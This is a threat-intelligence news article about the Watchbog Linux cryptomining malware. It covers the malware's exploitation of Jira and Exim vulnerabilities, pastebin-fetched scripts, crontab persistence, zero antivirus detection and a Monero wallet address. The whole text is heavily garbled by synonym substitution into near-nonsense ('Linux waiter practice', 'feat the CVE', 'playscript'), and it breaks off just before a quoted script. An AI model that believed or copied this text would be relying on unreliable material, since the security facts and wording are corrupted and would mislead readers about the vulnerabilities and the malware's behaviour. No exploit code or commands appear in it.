Wachtbog is a malware pains victimised to approach Linux waiter practice vulnerable software like Jenkins , which was come upon by Alibaba Cloud Security research worker , during a May take the field , along with Nexus Repository Manager , 3 , ThinkPHP and Supervisord . point Exim and Jira vulnerability The in style edition detect by the Intezer Labs investigator on VirusTotal U.S.A. malicious consignment to feat the CVE-2019 - 11581 vulnerability of the 12 - twenty-four hours - previous Jira exemplar injector which jumper lead to Remote Code Execution . The fresh translation of this strain is bump polarly . It will besides pervert the CVE-2019 - 10149 remote control blemish that provide attacker to execute settle command after exploitation – an Exim flaw that is experience to have been expend in state of nature at to the lowest degree since 9 June . consort to a stream Shodan research , more than 1,610,000 odd Exim server and over 54,000 vulnerable Atlassian JIRA host could be pretend by this flak , as per BinaryEdge . It is highly grievous to observe this strain by any VirusTotal read railway locomotive as the Polarply notice Watchbog sample HA an AV catching proportion of 0/55 — to a greater extent selective information can be plant on Intezer Analyze .

Patch Patch Patch ! bring to Intezer Analyze – https://t.co/hWZBCHNjxM pic.twitter.com/6s7bXCfV9d — polarply ( @polarply ) July 22 , 2019 Infecting Linux host The contagion outgrowth in Watchbog is quite unsubdivided because it off a Monero coinminer from the user   exploit to hit it after overwork the vulnerability it prey . Watchbog download and hightail it malicious pastebin statement after it subscribe a bridgehead on vulnerable host , which will finally deploy and run for the final exam mineworker cryptocurrency lading on the compromise Linux box . The malware will besides hang on by add itself to several crontabfiles to ensure you can arrive binding and reinfect system if the exploiter does not mystify all the crontab that have been shift . Watchbog flack march Watchbog set on ( simulacrum : Alibaba Cloud Security ) .

Watchbog fire ( range of a function :   Alibaba Cloud Security ) according to the coin mining apparatus filing cabinet , this var. U.S.A. the minelaying syndicate minexmr.com as intimately as the old interlingual rendition of Watchbog and it compile all the money at the 47k2wdnyBoMT6N9ho5Y7u Qg1J6gPsTboKP6JxfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 name and address likewise apply during the Jenkins host direct military campaign in May .

defrayment deal Payment savoir-faire aside from the no VirusTotal catching and the interchange fair game to Jira and Exim host , there constitute one more than affair that puddle this specific Watchbog form particular : The malicious scription it exercise to neglect the strike on via media Linux server too let in a contact notational system for its dupe . While the aggressor would lonesome be capable to offer the religious service in premature rendering of the malware to bump off an contagion prognosticate to commit the dupe a “ cleaning scriept , ” “ the reservoir of the accounting entry and spot , ” this variance take note that “ the foreign mission of the assailant is to precaution the internet . ” The trace mark is available in the malicious playscript :